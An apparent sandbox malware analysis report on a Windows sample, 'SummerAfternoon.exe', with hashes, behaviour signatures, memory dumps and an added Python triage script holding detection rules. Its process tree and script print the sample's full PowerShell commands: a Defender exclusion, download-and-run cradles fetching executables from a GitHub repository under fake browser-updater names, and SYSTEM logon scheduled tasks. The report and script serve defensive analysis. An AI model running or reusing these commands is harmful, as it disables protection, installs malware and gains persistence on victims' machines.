Resubmissions

09/06/2024, 07:13  240609-h18jrsgb74  (score 8)

09/06/2024, 06:51  240609-hmrn4afh72  (score 8)

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    09/06/2024, 07:13

General

  • Target

    SummerAfternoon/SummerAfternoon.exe

  • Size

    105KB

  • MD5

    3969fb2b3f1aba78dd50c3cb6b4e2137

  • SHA1

    b6fbd3cebda92a633369cbb979147ab645374d3b

  • SHA256

    9895f823394e434bb9a8ae10a3086960e5d60b10ef5c3877e4bed7b9411a9710

  • SHA512

    48b83334c8318c83c9122c44a26b02074c45bfed5ebd845b8ae4cc23957bda875473390ab2f91e46632eaef246c498ca63a3ef2df24771758296646bb4fb7c4e

  • SSDEEP

    3072:9GbNdhPc9aHE6j7F7I6jmBJqUYfWcE/ishP7KIz1+Km/J:9GbNdtc9wdh7T6bqUQo/ish+s

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SummerAfternoon\SummerAfternoon.exe
    "C:\Users\Admin\AppData\Local\Temp\SummerAfternoon\SummerAfternoon.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Set-MpPreference -ExclusionExtension *.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/1.exe" -OutFile "$Env:LocalAppData\Updates\firefox_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\firefox_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/2.exe" -OutFile "$Env:LocalAppData\Updates\chrome_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\chrome_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/3.exe" -OutFile "$Env:LocalAppData\Updates\ms_edge_updater.exe"; schtasks /create /tn "EdgeUpdater" /tr "$Env:LocalAppData\Updates\ms_edge_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\ms_edge_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /tn EdgeUpdater /tr C:\Users\Admin\AppData\Local\Updates\ms_edge_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f
        3⤵
        • Creates scheduled task(s)
        PID:296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/4.exe" -OutFile "$Env:LocalAppData\Updates\system_updater.exe"; schtasks /create /tn "SystemUpdater" /tr "$Env:LocalAppData\Updates\system_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\system_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /tn SystemUpdater /tr C:\Users\Admin\AppData\Local\Updates\system_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f
        3⤵
        • Creates scheduled task(s)
        PID:1448
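The process tree above spells out the whole chain in clear text: one PowerShell child adds a Defender exclusion for *.exe, four more pull 1.exe through 4.exe from the GitHub repository into %LocalAppData%\Updates under browser-updater names and launch them with Start-Process -Verb RunAs, and two of those also register ONLOGON scheduled tasks running as SYSTEM at the highest run level. Because the Network and Downloads sections of this report do not contain the fetched payloads, the command lines themselves are the best indicator source. The script below is an added triage example in Python, not part of the report and not the sample's own code: it runs the behavioural rules a detection engineer would write over these command lines and extracts the indicators. The command lines are copied from the Processes section; the rule names, the ATT&CK mappings in the comments and the "full chain" heuristic are the script's own assumptions.

```python
"""Triage helper for the process tree above (added example, not part of the
sandbox report): classify each command line against behavioural rules and
pull out the URLs, drop paths and scheduled-task names.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Command lines copied from the Processes section of the report (constructed list for this example).
COMMAND_LINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Set-MpPreference -ExclusionExtension *.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/1.exe" -OutFile "$Env:LocalAppData\Updates\firefox_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\firefox_updater.exe""',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/2.exe" -OutFile "$Env:LocalAppData\Updates\chrome_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\chrome_updater.exe""',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/3.exe" -OutFile "$Env:LocalAppData\Updates\ms_edge_updater.exe"; schtasks /create /tn "EdgeUpdater" /tr "$Env:LocalAppData\Updates\ms_edge_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\ms_edge_updater.exe""',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/4.exe" -OutFile "$Env:LocalAppData\Updates\system_updater.exe"; schtasks /create /tn "SystemUpdater" /tr "$Env:LocalAppData\Updates\system_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\system_updater.exe""',
    r'"C:\Windows\system32\schtasks.exe" /create /tn EdgeUpdater /tr C:\Users\Admin\AppData\Local\Updates\ms_edge_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f',
    r'"C:\Windows\system32\schtasks.exe" /create /tn SystemUpdater /tr C:\Users\Admin\AppData\Local\Updates\system_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f',
]

# Rules key on the attempt, not on success: Set-MpPreference needs elevation and
# the Defender module may not even be present on the sandbox OS, but the intent is
# visible either way. Rule names and ATT&CK mappings are this script's assumptions.
RULES = {
    # T1562.001 Impair Defenses: Defender exclusion added from the command line
    "defender_exclusion": re.compile(r"Set-MpPreference\s+-Exclusion(?:Extension|Path|Process)\b", re.I),
    # T1105 Ingress Tool Transfer: download cradle writing straight to disk
    "download_cradle": re.compile(r"Invoke-WebRequest\b.*?-OutFile\b", re.I),
    # Elevation prompt for a just-dropped binary
    "runas_dropped_file": re.compile(r"Start-Process\s+-Verb\s+RunAs\b", re.I),
    # T1053.005 Scheduled Task: logon-triggered task running as SYSTEM
    "system_logon_task": re.compile(r'schtasks(?:\.exe)?"?\s+/create\b.*?/sc\s+ONLOGON\b.*?/ru\s+"?SYSTEM\b', re.I),
    # T1059.001 PowerShell: execution policy bypassed on the interpreter itself
    "execpolicy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I),
}

URL_RE = re.compile(r'https?://[^\s"\';]+')
OUTFILE_RE = re.compile(r'-OutFile\s+"?([^"\s;]+)', re.I)
TASKNAME_RE = re.compile(r'/tn\s+"?([^"\s]+)', re.I)


def classify(cmdline: str) -> list[str]:
    """Names of the rules that fire on one command line, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def extract_iocs(cmdlines: list[str]) -> dict[str, list[str]]:
    """Deduplicated URLs, download hosts, drop paths and task names across the tree."""
    urls = sorted({u for c in cmdlines for u in URL_RE.findall(c)})
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).netloc for u in urls}),
        "drop_paths": sorted({p for c in cmdlines for p in OUTFILE_RE.findall(c)}),
        "task_names": sorted({t for c in cmdlines for t in TASKNAME_RE.findall(c)}),
    }


def triage(cmdlines: list[str]) -> dict:
    """Per-line tags, per-rule hit counts, IOCs and a chain verdict for the whole tree."""
    per_line = [classify(c) for c in cmdlines]
    hits = {name: sum(name in tags for tags in per_line) for name in RULES}
    # Exclusion + download + SYSTEM logon task in one tree is the complete
    # evasion -> delivery -> persistence chain and worth escalating on its own.
    full_chain = all(hits[k] for k in ("defender_exclusion", "download_cradle", "system_logon_task"))
    return {"per_line": per_line, "hits": hits, "full_chain": full_chain, "iocs": extract_iocs(cmdlines)}


if __name__ == "__main__":
    result = triage(COMMAND_LINES)
    for cmd, tags in zip(COMMAND_LINES, result["per_line"]):
        print(f"{', '.join(tags) or '-':70} {cmd[:60]}...")
    print("hits:", result["hits"])
    print("full chain:", result["full_chain"])
    for key, values in result["iocs"].items():
        print(f"{key}: {values}")
```

On this tree the script reports one Defender-exclusion hit, four download cradles, four elevation prompts, four SYSTEM logon-task hits (two inline in PowerShell, two from the spawned schtasks.exe), github.com as the only download host, the four updater paths under %LocalAppData%\Updates, and the task names EdgeUpdater and SystemUpdater, which are the first things to check and remove on a host that ran this sample. The regexes are deliberately loose about quoting and argument order because real telemetry (Sysmon Event ID 1, 4688 with command-line auditing) records these lines with varying quoting.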

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VHZSEA2GXM7NB21I6ZZR.temp

    Filesize

    7KB

    MD5

    4f89019d3f71d02108ee020cb85c6b2b

    SHA1

    7c7f34ba42c545590f1b823e1045c5ac0796719c

    SHA256

    ecbc72354af055626356626fc89d97515b3d8fa818716d765705c1f9825940ea

    SHA512

    a7f362acb8a1418611e36da3a0c6a2b6ea8a856c131b5ea2fa1255ec9140e30241604afd9cfd73fe37dcf10f85d941d2b8f6a20785a4128b76b3349b032fc85c

  • memory/2412-23-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2412-29-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB

  • memory/2604-0-0x000007FEF5AF3000-0x000007FEF5AF4000-memory.dmp

    Filesize

    4KB

  • memory/2604-1-0x000000013F690000-0x000000013F6AE000-memory.dmp

    Filesize

    120KB

  • memory/2604-2-0x0000000000770000-0x000000000077E000-memory.dmp

    Filesize

    56KB

  • memory/2604-3-0x000000001B410000-0x000000001B4A0000-memory.dmp

    Filesize

    576KB

  • memory/2604-4-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

    Filesize

    9.9MB

  • memory/2604-5-0x000007FEF5AF3000-0x000007FEF5AF4000-memory.dmp

    Filesize

    4KB

  • memory/2604-6-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

    Filesize

    9.9MB